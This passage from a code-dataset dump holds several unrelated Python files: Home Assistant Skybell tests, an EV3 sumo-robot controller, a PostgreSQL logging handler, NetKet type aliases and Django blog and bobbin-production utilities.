\"already_configured\"\n\n\nasync def test_flow_user_cannot_connect(hass: HomeAssistant) -> None:\n \"\"\"Test user initialized flow with unreachable server.\"\"\"\n with _patch_skybell() as skybell_mock:\n skybell_mock.side_effect = exceptions.SkybellException(hass)\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}, data=CONF_CONFIG_FLOW\n )\n assert result[\"type\"] == FlowResultType.FORM\n assert result[\"step_id\"] == \"user\"\n assert result[\"errors\"] == {\"base\": \"cannot_connect\"}\n\n\nasync def test_invalid_credentials(hass: HomeAssistant) -> None:\n \"\"\"Test that invalid credentials throws an error.\"\"\"\n with patch(\"homeassistant.components.skybell.Skybell.async_login\") as skybell_mock:\n skybell_mock.side_effect = exceptions.SkybellAuthenticationException(hass)\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}, data=CONF_CONFIG_FLOW\n )\n\n assert result[\"type\"] == FlowResultType.FORM\n assert result[\"step_id\"] == \"user\"\n assert result[\"errors\"] == {\"base\": \"invalid_auth\"}\n\n\nasync def test_flow_user_unknown_error(hass: HomeAssistant) -> None:\n \"\"\"Test user initialized flow with unreachable server.\"\"\"\n with _patch_skybell_devices() as skybell_mock:\n skybell_mock.side_effect = Exception\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}, data=CONF_CONFIG_FLOW\n )\n assert result[\"type\"] == FlowResultType.FORM\n assert result[\"step_id\"] == \"user\"\n assert result[\"errors\"] == {\"base\": \"unknown\"}\n\n\nasync def test_flow_import(hass: HomeAssistant) -> None:\n \"\"\"Test import step.\"\"\"\n with _patch_skybell(), _patch_skybell_devices(), _patch_setup_entry(), _patch_setup():\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_IMPORT}\n )\n result = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n user_input=CONF_CONFIG_FLOW,\n )\n assert result[\"type\"] == 
FlowResultType.CREATE_ENTRY\n assert result[\"title\"] == \"user\"\n assert result[\"data\"] == CONF_CONFIG_FLOW\n\n\nasync def test_flow_import_already_configured(hass: HomeAssistant) -> None:\n \"\"\"Test import step already configured.\"\"\"\n entry = MockConfigEntry(\n domain=DOMAIN, unique_id=\"123456789012345678901234\", data=CONF_CONFIG_FLOW\n )\n\n entry.add_to_hass(hass)\n\n with _patch_skybell():\n result = await hass.config_entries.flow.async_init(\n DOMAIN,\n context={\"source\": SOURCE_IMPORT},\n )\n assert result[\"type\"] == FlowResultType.ABORT\n assert result[\"reason\"] == \"already_configured\"\n","sub_path":"tests/components/skybell/test_config_flow.py","file_name":"test_config_flow.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"581186095","text":"from gameobjects.gameobjects import *\nimport pygame\n\n\nclass FixSquid(GameObject):\n def __init__(self, d, position, frame, depth, *tags):\n GameObject.__init__(self, d, Tags.VISIBLE, Tags.UPDATABLE, Tags.PHYSIC, *tags)\n\n self.__frame = frame\n self.__depth = depth\n\n self.activity = Activity(self, None)\n\n self.position = Position(\n owner=self,\n position=position,\n )\n\n\n def update(self, tick):\n pass\n\n\n @property\n def frame(self):\n return self.__frame\n\n @property\n def depth(self):\n return self.__depth","sub_path":"gameobjects/pawns/fixsquid.py","file_name":"fixsquid.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640269935","text":"#!/usr/bin/python3\r\n\r\nfrom time import sleep\r\nfrom threading import Thread\r\nfrom multiprocessing import Process, Value\r\nimport sys, os\r\n\r\nfrom ev3dev.ev3 import *\r\n\r\n# Will need to check EV3 button state\r\nbtn = Button()\r\n\r\n# Connect motors\r\nrightMotor = LargeMotor(OUTPUT_A)\r\nassert rightMotor.connected, \"Error: Right motor not connected\"\r\nleftMotor = LargeMotor(OUTPUT_D)\r\nassert leftMotor.connected, \"Error: Left motor not connected\"\r\nultraMotor = MediumMotor(OUTPUT_C)\r\nassert ultraMotor.connected, \"Error: Ultra motor not connected\"\r\n\r\n# Connect colour sensor\r\ncolorSensor = ColorSensor()\r\nassert colorSensor.connected, \"Error: Color sensor not connected\"\r\ncolorSensor.mode = \"COL-COLOR\"\r\n\r\n# BASIC FUNCTIONS\r\nCLOCKWISE = 1\r\nANTICLOCKWISE = -1\r\n# To drive\r\ndef drive(left, right, time):\r\n if (time == 0):\r\n leftMotor.run_direct(duty_cycle_sp = -left)\r\n rightMotor.run_direct(duty_cycle_sp = -right)\r\n else:\r\n leftMotor.run_timed(speed_sp=left, time_sp=time * 1000)\r\n rightMotor.run_timed(speed_sp=right, time_sp=time * 1000)\r\n\r\ndef drift():\r\n drive(55, 100, 1)\r\n\r\n# Stops large motors\r\ndef brake():\r\n leftMotor.stop(stop_action='brake')\r\n rightMotor.stop(stop_action='brake')\r\n\r\ndef turn(dir, angle):\r\n \"\"\"\r\n Turn in the direction opposite to the contact.\r\n \"\"\"\r\n\r\n # We want to turn the robot wheels in opposite directions\r\n rightMotor.run_timed(speed_sp=dir*-750, time_sp=250*(angle / 46))\r\n leftMotor.run_timed(speed_sp=dir*750, time_sp=250*(angle / 46))\r\n\r\n # Wait until both motors are stopped:\r\n while any(m.state for m in (leftMotor, rightMotor)):\r\n sleep(0.1)\r\n\r\n\r\n\r\n\r\n# Connect ultrasonic sensor\r\n# https://sites.google.com/site/ev3python/learn_ev3_python/using-sensors\r\n# 
https://media.readthedocs.org/pdf/ev3dev-lang/latest/ev3dev-lang.pdf\r\nultraSensor = UltrasonicSensor()\r\nassert ultraSensor.connected, \"Error: Ultrasonic sensor not connected\"\r\nultraSensor.mode = \"US-DIST-CM\" # This is actually in millimetres\r\n\r\n# DONE! (don't touch unless you know what you're doing - Lucas)\r\n# Input constants (they don't need to be global after all!)\r\nSEARCH_DISTANCE = 50 # In centimetres\r\nREVOLUTION = 360\r\nSPEED = REVOLUTION * 1 # In degrees per second\r\n\r\n# Output variable\r\nangle_target = Value(\"i\", 0) # The angle (in degrees) that a target was last found at\r\n# 0 = straight ahead, -90 to the left, 90 to the right etc.\r\n\r\n# Initialise the turret process, independent from the main program\r\ndef init_turret(delay):\r\n ultraMotor.reset() # Set the current angle to 0\r\n ultraMotor.stop_action = \"brake\"\r\n # Begin a new process which will run concurrently\r\n p = Process(target=lock_turret, args=(delay, angle_target))\r\n p.daemon = True\r\n p.start() # Initialise process\r\n\r\n# Turret thread\r\n# Thread runs a huge loop to scan for a target within SEARCH_DISTANCE\r\ndef lock_turret(delay, angle):\r\n ultraMotor = MediumMotor(OUTPUT_C)\r\n assert ultraMotor.connected, \"Error: Ultra motor not connected\"\r\n direction = -1 # Scan direction: 1 = clockwise | -1 = anticlockwise\r\n distance = 100 # The distance (in centimetres) output of the ultra sensor\r\n found = False # Whether target has been found\r\n sleep(delay) # Delay to allow operator to move away before turret rotates\r\n ultraMotor.run_forever(speed_sp = direction * SPEED) # Scan to the left\r\n while True: # Huge loop\r\n # Prevent tangling of ultrasonic sensor cable\r\n if (ultraMotor.position > REVOLUTION or ultraMotor.position < -REVOLUTION):\r\n print(\"turret: fix tangle\")\r\n ultraMotor.stop() # Stop further rotation\r\n sleep(0.2) # Delay after stopping\r\n if (ultraMotor.position > 0): # Rotate opposite direction\r\n direction = -1 # Rotate anticlockwise\r\n else:\r\n direction = 1 # Rotate clockwise\r\n ultraMotor.position_sp = direction * REVOLUTION /8\r\n ultraMotor.run_to_abs_pos(speed_sp = SPEED)\r\n while any(ultraMotor.state): # Wait until finished rotating\r\n sleep(0.05)\r\n # Continue rotating (and scanning) in direction\r\n ultraMotor.run_forever(speed_sp = direction * SPEED)\r\n direction *= -1 # Reset to previous direction\r\n # Then keep rotating and scanning for a target within SEARCH_DISTANCE\r\n distance = ultraSensor.value() # Output distance in millimetres\r\n # Found a target! 
Store in angle\r\n        if (distance <= SEARCH_DISTANCE * 10 and found == False):\r\n            angle.value = fix_angle(ultraMotor.position)\r\n            ultraMotor.stop() # Stop scanning\r\n            found = True\r\n        # Lost the target - scan the immediate area (within 45 degrees)\r\n        elif (distance > SEARCH_DISTANCE * 10 and found == True):\r\n            print("turret: lost target")\r\n            # Keep scanning briefly in the direction it was scanning before\r\n            ultraMotor.position_sp = ultraMotor.position + direction * REVOLUTION /4\r\n            ultraMotor.run_to_abs_pos(speed_sp = SPEED)\r\n            found = False\r\n            while any(ultraMotor.state):\r\n                sleep(0.05)\r\n                distance = ultraSensor.value() # Re-read the sensor while sweeping\r\n                if (distance <= SEARCH_DISTANCE * 10): # Found the target again!\r\n                    angle.value = fix_angle(ultraMotor.position)\r\n                    ultraMotor.stop() # Stop scanning\r\n                    found = True\r\n            # The target changed direction, resume scan in the opposite direction\r\n            if (found == False): # Couldn't find target\r\n                sleep(0.2) # Delay after stopping\r\n                direction *= -1 # Switch scan direction and resume scanning\r\n                ultraMotor.run_forever(speed_sp = direction * SPEED)\r\n        sleep(0.02)\r\n\r\n# Change {-360 <= angle <= 360} to {-180 <= angle <= 180}\r\ndef fix_angle(angle):\r\n    # {-180 <= angle <= 180} 270 degrees clockwise = 90 degrees anticlockwise\r\n    if (angle < -180):\r\n        angle += 360\r\n    elif (angle > 180):\r\n        angle -= 360\r\n    print("turret: found target")\r\n    print("(target at %d degrees)" % angle)\r\n    return angle\r\n# Can now obtain location of target from angle_target.value\r\n# \r\n\r\n\r\n# Initialise the chase thread, independent from the main program\r\nchase = True\r\ndef init_chase(delay):\r\n    t = Thread(target=chase_target, args=(delay,))\r\n    t.setDaemon(True)\r\n    t.start() # Initialise thread\r\n\r\ndef chase_target(delay):\r\n    global chase\r\n    last = 0 # Angle the target was last chased at\r\n    sleep(delay)\r\n    while True:\r\n        angle = angle_target.value\r\n        # If the robot isn't directly facing the opponent\r\n        # stop and straighten up\r\n        if (chase == True and (angle <= -15 or angle >= 15) and angle != last):\r\n            print("chase: chasing target at %d degrees" % angle)\r\n            rightMotor.stop()\r\n            leftMotor.stop()\r\n            sleep(0.2) # Delay after stopping\r\n            if (angle < 0):\r\n                # Turn robot clockwise\r\n                print("chase: turning clockwise")\r\n                turn(CLOCKWISE, angle * -1)\r\n                # drive(100, 100, 0)\r\n            else:\r\n                # Turn robot anticlockwise\r\n                print("chase: turning anticlockwise")\r\n                turn(ANTICLOCKWISE, angle)\r\n                # drive(100, 100, 0)\r\n            print("chase: finished turning")\r\n            print("chase: (target now at %d degrees)" % angle)\r\n            last = angle\r\n        # If opponent is straight ahead, charge\r\n        if (chase == True and (angle > -15 and angle < 15)):\r\n            print("drive: locked on target, chasing")\r\n            #drive(100,100, 0)\r\n        sleep(0.05)\r\n        print("(chase: target now at %d degrees)" % angle)\r\n\r\n\r\ndef start():\r\n    print("Enter right motor speed then left motor speed.")\r\n    x = 0\r\n    y = 0\r\n    x = input()\r\n    y = input()\r\n    x = int(x)\r\n    y = int(y)\r\n    rightMotor.run_direct(duty_cycle_sp = -x)\r\n    leftMotor.run_direct(duty_cycle_sp = -y)\r\n\r\n\r\ndef check_ring():\r\n    global chase\r\n    colors = ("unknown", "black", "blue", "green", "yellow", "red", "white", "brown")\r\n    if (colorSensor.value() == 1):\r\n        chase = False\r\n        print("black found")\r\n        # Reverse\r\n        print("drive: reversing")\r\n        #drive(-100, -100, 0)\r\n        sleep(1.1)\r\n        # Turn\r\n        # ((ultraSensor.value() / 10) >= SEARCH_DISTANCE):\r\n        #drive(100, 100, 0)\r\n        print("drive: turning")\r\n        #turn(CLOCKWISE, 180)\r\n        
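# Sketch of the presumably intended escape maneuver (assuming the\r\n        # commented-out drive/turn calls around this block are re-enabled):\r\n        # back away from the black edge for ~1.1 s, spin 180 degrees,\r\n        # then resume the chase.\r\n        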
#brake()\r\n        print("check_ring complete")\r\n        chase = True\r\n\r\ndef aesthetics():\r\n    # Makes the robot say something\r\n    Sound.speak('Exterminate').wait()\r\n    sleep(0.5)\r\n    Sound.speak('Exterminate').wait()\r\n    sleep(1)\r\n    Sound.speak('Prepare for doom').wait()\r\n    # Is the sound really necessary?\r\n\r\ndef aesthetics_thread():\r\n    t = Thread(target=aesthetics)\r\n    t.setDaemon(True)\r\n    t.start()\r\n\r\n# aesthetics_thread()\r\ninit_turret(0.1) # Begin tracking the target after a 0.1 second start-up delay\r\nsleep(3)\r\n# start()\r\ninit_chase(0.1)\r\n# Run the robot until a button is pressed.\r\nwhile not (btn.any()):\r\n    check_ring()\r\n\r\n# Stop the motors before exiting.\r\nrightMotor.stop()\r\nleftMotor.stop()\r\nultraMotor.stop()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"505979719","text":"#!/bin/python\n# -*- coding: utf-8 -*-\n# @File : logger.py\n# @Author: wangms\n# @Date : 2018/11/12\nimport logging\nimport psycopg2\nfrom datetime import datetime\n\nclass DBHandler(logging.Handler):\n    terminator = '\\n'\n\n    def __init__(self):\n        super(DBHandler, self).__init__()\n        self.conn = psycopg2.connect(host='192.168.1.111', port=5432, dbname='test', user='postgres', password='postgres')\n\n    def flush(self):\n        self.acquire()\n        try:\n            self.conn.commit()\n        finally:\n            self.release()\n\n    def emit(self, record):\n        try:\n            with self.conn.cursor() as cursor:\n                cursor.execute(\"\"\"\n                insert into dev_python_log(log_time, log_level, file_name, line_no, message) values (%s,%s,%s,%s,%s)\n                \"\"\", (datetime.fromtimestamp(record.created), record.levelname,\n                      record.pathname, record.lineno, record.msg))\n            self.flush()\n        except Exception:\n            self.handleError(record)\n\n    def __repr__(self):\n        level = logging.getLevelName(self.level)\n        return '<%s (%s)>' % (self.__class__.__name__, level)\n\n\ndef fetchLogger():\n    logger = logging.getLogger(\"test\")\n    logger.setLevel(logging.DEBUG)\n\n    stream = logging.StreamHandler()\n    fmt = logging.Formatter(\"%(asctime)s - %(filename)s - %(module)s - %(levelname)s - %(message)s\")\n    stream.setFormatter(fmt)\n    logger.addHandler(stream)\n\n    db = DBHandler()\n    logger.addHandler(db)\n\n    return logger\n\n\nif __name__ == '__main__':\n    logger = fetchLogger()\n    logger.info(\"start\")\n\n","sub_path":"common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"523084591","text":"# Copyright 2021 The NetKet Authors - All rights reserved.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Any, Sequence, Callable, Union\n\nPRNGKeyT = Any\nSeedT = Union[int, PRNGKeyT]\n\nShape = Sequence[int]\nDType = Any # this could be a real type?\nArray = Any\n\nNNInitFunc = Callable[[PRNGKeyT, Shape, DType], Array]\n\nPyTree = 
Any\n","sub_path":"netket/utils/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"268484948","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Post\nfrom django.contrib.auth.models import User\n\ndef front_view(request):\n posts = Post.objects.all()\n context = {\n 'title' : \"blAN 2016\",\n 'posts' : posts,\n }\n return render(request, \"front_page.html\", context=context)\n\ndef post_display(request, url):\n post = get_object_or_404(Post, url=url)\n context = {\n 'title' : post.title,\n 'post' : post,\n }\n return render(request, \"display_post.html\", context=context)","sub_path":"blan/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121106515","text":"from producao.models import *\nimport datetime\nfrom django.contrib.sessions.models import Session\nimport pyodbc\n\n\ndef areas(pk):\n bobinagem = Bobinagem.objects.get(pk=pk)\n bobine = Bobine.objects.filter(bobinagem=bobinagem)\n\n # area_g = bobinagem.area_g\n # area_r = bobinagem.area_r\n # area_dm = bobinagem.area_dm\n # area_ind = bobinagem.area_ind\n # area_ba = bobinagem.area_ba\n\n area_g = 0\n area_r = 0\n area_dm = 0\n area_ind = 0\n area_ba = 0\n\n for b in bobine:\n estado = b.estado\n\n if estado == 'G':\n area_g += b.area\n \n elif estado == 'R':\n area_r += b.area\n \n elif estado == 'DM':\n area_dm += b.area\n\n elif estado == 'IND':\n area_ind += b.area\n\n elif estado == 'BA':\n area_ba += b.area\n \n bobinagem.area_g = area_g\n bobinagem.area_r = area_r\n bobinagem.area_dm = area_dm\n bobinagem.area_ind = area_ind\n bobinagem.area_ba = area_ba\n bobinagem.save()\n\ndef update_areas_bobine(pk, estado):\n bobine = Bobine.objects.get(pk=pk)\n bobinagem = bobine.bobinagem\n estado_anterior = estado\n estado_actual = bobine.estado\n\n if estado_actual == estado_anterior:\n pass\n elif estado_anterior == 'LAB' or estado_anterior == 'HOLD':\n if estado_actual == 'G':\n bobinagem.area_g += bobine.area\n elif estado_actual == 'DM':\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_r += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_ba += bobine.area\n elif estado_anterior == 'G':\n if estado_actual == 'DM':\n bobinagem.area_g -= bobine.area\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_g -= bobine.area\n bobinagem.area_r += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_g -= bobine.area\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_g -= bobine.area\n bobinagem.area_ba += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_g -= bobine.area\n elif estado_actual == 'HOLD':\n bobinagem.area_g -= bobine.area\n \n elif estado_anterior == 'DM':\n if estado_actual == 'G':\n bobinagem.area_dm -= bobine.area\n bobinagem.area_g += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_dm -= bobine.area\n bobinagem.area_r += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_dm -= bobine.area\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_dm -= bobine.area\n bobinagem.area_ba += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_dm -= bobine.area\n \n elif estado_actual == 'HOLD':\n 
bobinagem.area_dm -= bobine.area\n \n\n elif estado_anterior == 'R':\n if estado_actual == 'G':\n bobinagem.area_r -= bobine.area\n bobinagem.area_g += bobine.area\n elif estado_actual == 'DM':\n bobinagem.area_r -= bobine.area\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_r -= bobine.area\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_r -= bobine.area\n bobinagem.area_ba += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_r -= bobine.area\n \n elif estado_actual == 'HOLD':\n bobinagem.area_r -= bobine.area\n \n\n elif estado_anterior == 'IND':\n if estado_actual == 'G':\n bobinagem.area_ind -= bobine.area\n bobinagem.area_g += bobine.area\n elif estado_actual == 'DM':\n bobinagem.area_ind -= bobine.area\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_ind -= bobine.area\n bobinagem.area_r += bobine.area\n elif estado_actual == 'BA':\n bobinagem.area_ind -= bobine.area\n bobinagem.area_ba += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_ind -= bobine.area\n \n elif estado_actual == 'HOLD':\n bobinagem.area_ind -= bobine.area\n \n elif estado_anterior == 'BA':\n if estado_actual == 'G':\n bobinagem.area_ba -= bobine.area\n bobinagem.area_g += bobine.area\n elif estado_actual == 'DM':\n bobinagem.area_ba -= bobine.area\n bobinagem.area_dm += bobine.area\n elif estado_actual == 'R':\n bobinagem.area_ba -= bobine.area\n bobinagem.area_r += bobine.area\n elif estado_actual == 'IND':\n bobinagem.area_ba -= bobine.area\n bobinagem.area_ind += bobine.area\n elif estado_actual == 'LAB':\n bobinagem.area_ba -= bobine.area\n \n elif estado_actual == 'HOLD':\n bobinagem.area_ba -= bobine.area\n \n \n \n bobinagem.save() \n\n \n \ndef bobinagem_create(pk):\n instance = Bobinagem.objects.get(pk=pk)\n if not instance.nome:\n data = instance.data\n data = data.strftime('%Y%m%d')\n map(int, data)\n if instance.perfil.retrabalho == True and instance.num_emendas > 0:\n if instance.num_bobinagem < 10:\n # instance.nome = '3%s-0%s' % (data, instance.num_bobinagem)\n instance.nome = '3%s-0%s' % (data[1:], instance.num_bobinagem)\n\n else:\n instance.nome = '3%s-%s' % (data[1:], instance.num_bobinagem)\n elif instance.perfil.retrabalho == True and instance.num_emendas == 0:\n if instance.num_bobinagem < 10:\n instance.nome = '4%s-0%s' % (data[1:], instance.num_bobinagem)\n else:\n instance.nome = '4%s-%s' % (data[1:], instance.num_bobinagem)\n else:\n if instance.num_bobinagem < 10:\n instance.nome = '%s-0%s' % (data, instance.num_bobinagem)\n else:\n instance.nome = '%s-%s' % (data, instance.num_bobinagem)\n \n instance.save()\n desperdicio(instance.pk) \n if not instance.perfil.retrabalho == True:\n tempo_duracao(instance.pk)\n area_bobinagem(instance.pk) \n create_bobine(instance.pk) \n\ndef bobinagem_create_retrabalho(pk):\n instance = Bobinagem.objects.get(pk=pk)\n if not instance.nome:\n data = instance.data\n data = data.strftime('%Y%m%d')\n map(int, data)\n if instance.num_bobinagem < 10:\n instance.nome = '4%s-0%s' % (data[1:], instance.num_bobinagem)\n else:\n instance.nome = '4%s-%s' % (data[1:], instance.num_bobinagem)\n \n instance.save()\n area_bobinagem(instance.pk) \n create_bobine(instance.pk) \n \n \n \n\ndef create_bobine(pk):\n instance = Bobinagem.objects.get(pk=pk)\n num = 1\n desp_bobine = instance.desper / Decimal(instance.perfil.num_bobines)\n for i in range(instance.perfil.num_bobines):\n lar = Largura.objects.get(perfil=instance.perfil, num_bobine=num)\n bob 
= Bobine.objects.filter(bobinagem=instance, largura=lar)\n        if not bob:\n            bob = Bobine.objects.create(bobinagem=instance, largura=lar, comp_actual=instance.comp, comp = instance.comp, artigo=lar.artigo, designacao_prod=lar.designacao_prod, diam=instance.diam, cliente=lar.cliente.nome)\n            if num < 10:\n                bob.nome = '%s-0%s' % (instance.nome, num)\n            else:\n                bob.nome = '%s-%s' % (instance.nome, num)\n            if bob.bobinagem.estado == 'R':\n                bob.estado = 'R' \n            elif bob.bobinagem.estado == 'DM':\n                bob.estado = 'DM'\n            elif bob.bobinagem.estado == 'G':\n                bob.estado = 'G'\n            elif bob.bobinagem.estado == 'BA':\n                bob.estado = 'BA'\n            elif bob.bobinagem.estado == 'IND':\n                bob.estado = 'IND'\n            elif bob.bobinagem.estado == 'SC':\n                bob.estado = 'SC'\n            else:\n                bob.estado = 'LAB'\n\n            if instance.tipo_desp == 'R':\n                bob.tipo_desp = 'R'\n                bob.desp = desp_bobine\n            elif instance.tipo_desp == 'BA':\n                bob.tipo_desp = 'BA'\n                bob.desp = desp_bobine\n\n            bob.save() \n            area_bobine(bob.pk)\n        num += 1\n    \n    \ndef tempo_duracao(pk):\n    instance = Bobinagem.objects.get(pk=pk)\n    if instance.inico or instance.fim:\n        # if not instance.duracao:\n        fim = instance.fim\n        fim = fim.strftime('%H:%M')\n        inico = instance.inico\n        inico = inico.strftime('%H:%M')\n        (hf, mf) = fim.split(':')\n        (hi, mi) = inico.split(':')\n        if hf < hi: \n            result = (int(hf) * 3600 + int(mf) * 60) - (int(hi) * 3600 + int(mi) * 60) + 86400\n        else:\n            result = (int(hf) * 3600 + int(mf) * 60) - (int(hi) * 3600 + int(mi) * 60) \n        \n        result_str = strftime(\"%H:%M\", gmtime(result))\n        instance.duracao = result_str\n        instance.save()\n\ndef area_bobinagem(pk):\n    instance = Bobinagem.objects.get(pk=pk)\n    largura = instance.perfil.largura_bobinagem / 1000\n    instance.area = instance.comp_cli * largura\n    instance.save()\n\ndef desperdicio(pk):\n    instance = Bobinagem.objects.get(pk=pk)\n    if instance.comp_par > 0:\n        desp = instance.comp - instance.comp_par\n        x = instance.comp_par * Decimal('0.05')\n        if desp <= x:\n            instance.comp_cli = instance.comp\n        else: \n            instance.comp_cli = instance.comp_par * Decimal('1.05')\n        instance.desper = (instance.comp - instance.comp_cli) / 1000 * instance.perfil.largura_bobinagem\n    elif instance.comp_par == 0:\n        instance.comp_cli = instance.comp\n        instance.desper = 0\n    instance.save()\n\ndef area_bobine(pk):\n    instance = Bobine.objects.get(pk=pk)\n    largura = instance.largura.largura / 1000\n    instance.area = largura * instance.bobinagem.comp_cli\n    instance.save()\n\ndef etiqueta_add_bobine(pk_palete, pk_bobine):\n    palete = Palete.objects.get(pk=pk_palete)\n    bobine = Bobine.objects.get(pk=pk_bobine)\n    e_p = EtiquetaPalete.objects.get(palete=palete)\n\n    # Write the bobine name into the EtiquetaPalete slot (bobine1..bobine60)\n    # that matches its position on the palete.\n    posicao = bobine.posicao_palete\n    setattr(e_p, 'bobine%s' % posicao, bobine.nome)\n\n    e_p.save()\n\ndef palete_nome(pk):\n    instance = Palete.objects.get(pk=pk)\n    if not instance.nome:\n        ano = instance.data_pal\n        
ano = ano.strftime('%Y')\n        if instance.estado == 'DM':\n            num = instance.num\n            \n            if num < 10:\n                instance.nome = 'DM000%s-%s' % (num, ano)\n            elif num < 100:\n                instance.nome = 'DM00%s-%s' % (num, ano)\n            elif num < 1000:\n                instance.nome = 'DM0%s-%s' % (num, ano)\n            else:\n                instance.nome = 'DM%s-%s' % (num, ano)\n            instance.save()\n\n        elif instance.estado == 'G':\n            if instance.retrabalhada == False: \n                # palete = Palete.objects.filter(estado='G', data_pal__gte='2019-01-01')\n                # num = 0\n                # for p in palete:\n                #     if p.num > num:\n                #         num = p.num\n                \n                num = instance.num\n                if num < 10: \n                    instance.nome = 'P000%s-%s' % (num, ano) \n                elif num < 100:\n                    instance.nome = 'P00%s-%s' % (num, ano)\n                elif num < 1000:\n                    instance.nome = 'P0%s-%s' % (num, ano)\n                else: \n                    instance.nome = 'P%s-%s' % (num, ano)\n\n                instance.save()\n\n    \n    if EtiquetaPalete.objects.filter(palete=instance).exists():\n        return redirect('producao:palete_details', pk=instance.pk)\n    else:\n        if instance.retrabalhada == False:\n            e_p = EtiquetaPalete.objects.create(palete=instance, palete_nome=instance.nome, largura_bobine=instance.largura_bobines)\n            if instance.cliente != None:\n                e_p.cliente = instance.cliente.nome\n        else:\n            e_p = EtiquetaPalete.objects.create(palete=instance, palete_nome=instance.nome, largura_bobine=instance.largura_bobines)\n        e_p.save()\n    \n    \ndef bobinagem_retrabalho_nome(data, num_bobinagem):\n    data = data.strftime('%Y%m%d')\n    map(int, data)\n    if num_bobinagem < 10:\n        nome_s_emendas = '4%s-0%s' % (data[1:], num_bobinagem)\n        nome_c_emendas = '3%s-0%s' % (data[1:], num_bobinagem)\n    else:\n        nome_s_emendas = '4%s-%s' % (data[1:], num_bobinagem)\n        nome_c_emendas = '3%s-%s' % (data[1:], num_bobinagem)\n\n    return (nome_s_emendas, nome_c_emendas)\n\n\ndef update_etiqueta_final(pk):\n    palete = get_object_or_404(Palete, pk=pk)\n    e_p = get_object_or_404(EtiquetaPalete, palete=palete)\n    e_f = get_object_or_404(EtiquetaFinal, palete=palete)\n    bobines = Bobine.objects.filter(palete=palete)\n    bobine_1 = Bobine.objects.get(palete=palete, posicao_palete=1)\n    palete_nome = e_p.palete_nome\n    produto = e_p.produto\n    largura_bobine = e_p.largura_bobine\n    diam_min = e_p.diam_min\n    diam_max = e_p.diam_max\n    cliente = e_p.cliente\n    cod_cliente = palete.cliente.cod\n    core_bobines = palete.core_bobines\n    area = palete.area\n    comp_total = palete.comp_total\n    prf = palete.carga.enc.prf\n    num_bobines = palete.num_bobines\n    peso_liquido = palete.peso_liquido\n    peso_bruto = palete.peso_bruto\n    num_paletes_total = palete.carga.num_paletes\n    num_palete_carga = palete.num_palete_carga\n\n    cod_cliente_cliente = None\n    if cliente == 'ONTEX':\n        if largura_bobine == 140:\n            cod_cliente_cliente = 'G2.6592'\n        elif largura_bobine == 80:\n            cod_cliente_cliente = 'G2.6590'\n        elif largura_bobine == 70:\n            cod_cliente_cliente = 'G2.6589'\n        elif largura_bobine == 65:\n            cod_cliente_cliente = 'G2.6543'\n        elif largura_bobine == 130:\n            cod_cliente_cliente = 'G2.6591'\n    elif cliente == 'ABENA':\n        if largura_bobine == 150:\n            cod_cliente_cliente = '10000018848'\n    elif cliente == 'Paul Hartman':\n        if largura_bobine == 240:\n            cod_cliente_cliente = 'ELASTEK m16'\n    elif cliente == 'Sanita S.A.L.':\n        if largura_bobine == 150:\n            cod_cliente_cliente = 'R406EAR15'\n\n    if core_bobines == '3':\n        core_bobines = 76.6\n    elif core_bobines == '6':\n        core_bobines = 152.6\n\n    #data_inicial = palete.carga.data\n    data_init = None\n    for b in bobines:\n        if data_init == None or b.bobinagem.data < data_init:\n            data_init = b.bobinagem.data\n    data_prod = data_init\n    #data_prod = data_inicial\n    
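# The loop above picks the earliest bobinagem date on the palete as the\n    # production date; an equivalent one-liner would be:\n    #     data_prod = min(b.bobinagem.data for b in bobines)\n    # (days=356 below is kept from the source; it is presumably intended as\n    # a roughly one-year validity window)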
